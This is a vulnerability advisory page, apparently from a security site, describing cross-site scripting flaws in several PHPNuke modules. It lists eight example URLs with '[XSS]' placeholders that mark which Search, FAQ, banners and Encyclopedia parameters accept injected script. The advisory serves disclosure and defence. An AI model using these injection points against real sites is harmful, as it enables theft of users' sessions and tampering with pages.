• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

PHPNuke Multiple Module Cross-Site Scripting Vulnerabilities

An exploit is not required.

The following examples are available:
http://www.example.com/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our query]

http://www.example.com/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=users&category=2

http://www.example.com/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=comments&category=2

http://www.example.com/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=stories&category=2

http://www.example.com/[nuke_dir]/modules.php?name=Search&author=[author]&topic=0&min=999999999[XSS]&query=[our_query]&type=reviews&category=2

http://www.example.com/[nuke_dir]/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=45435[XSS]

http://www.example.com/[nuke_dir]/banners.php?op=EmailStats&login=[our_login]&cid=1&bid=[XSS]

http://www.example.com/[nuke_dir]/modules.php?name=Encyclopedia&file=index&op=terms&eid=1&ltr=[XSS]